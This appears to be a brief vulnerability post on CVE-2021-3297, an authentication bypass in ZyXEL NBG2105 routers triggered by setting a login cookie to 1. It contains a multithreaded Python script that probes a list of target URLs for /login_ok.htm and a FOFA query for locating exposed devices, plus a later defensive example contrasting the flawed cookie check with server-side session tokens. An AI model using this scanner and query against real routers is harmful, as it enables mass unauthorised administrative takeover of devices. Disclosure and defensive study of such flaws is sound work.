CVE-2021-3297: ZyXEL NBG2105 Authentication Bypass

2022-08-10 19:14:28

Introduction

On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.

PoC

import threading

import requests

threads = []


def thread(url):
    # Request the page and treat an HTTP 200 response as the indicator.
    try:
        result = requests.get(url, timeout=5)
        status = result.status_code
        if status == 200:
            print(url + "\n" + "vulnerable")
        else:
            print(url + "\n" + "not vulnerable")
    except Exception:
        print("timeout")


# ZyXEL_url.txt holds one base URL per line.
with open("ZyXEL_url.txt", "r") as f:
    for line in f.readlines():
        line = line.strip()
        tar = line + "/login_ok.htm"
        t = threading.Thread(target=thread, args=(tar,))
        t.start()
        threads.append(t)
# Wait for every worker thread to finish.
for i in threads:
    i.join()

Changing the login parameter makes it possible to log in to the admin backend and then modify the device's configuration.
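
The flaw described above comes down to the server trusting a client-supplied cookie value as proof of login. As an added example (not from the original post and not the device firmware's code), the following contrasts that pattern with a server-issued session token; the function names, the `session` cookie name and the TTL are assumptions made for illustration.

```python
import secrets
import time
from http.cookies import SimpleCookie

SESSION_TTL = 900  # seconds; constructed value for this example
_sessions = {}     # server-side store: token -> expiry timestamp


def parse_cookies(header):
    """Parse a raw Cookie header into a plain dict."""
    jar = SimpleCookie()
    jar.load(header or "")
    return {name: morsel.value for name, morsel in jar.items()}


def is_admin_flawed(cookie_header):
    """Flawed pattern: the client-supplied flag itself is the proof of login."""
    return parse_cookies(cookie_header).get("login") == "1"


def create_session(now=None):
    """Call only after the password check succeeded; returns the cookie value."""
    token = secrets.token_urlsafe(32)  # unguessable, generated by the server
    _sessions[token] = (now if now is not None else time.time()) + SESSION_TTL
    return token


def is_admin_hardened(cookie_header, now=None):
    """Accept only an unexpired token that this server issued itself."""
    now = now if now is not None else time.time()
    token = parse_cookies(cookie_header).get("session", "")
    expiry = _sessions.get(token)
    if expiry is None:
        return False  # unknown token: the client cannot mint its own
    if now >= expiry:
        _sessions.pop(token, None)  # drop expired sessions on sight
        return False
    return True
```

The hardened check never reads a value whose meaning the client controls: the cookie is only a lookup key into state the server created after a successful password check.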

FOFA query: app="ZyXEL-NBG2105"
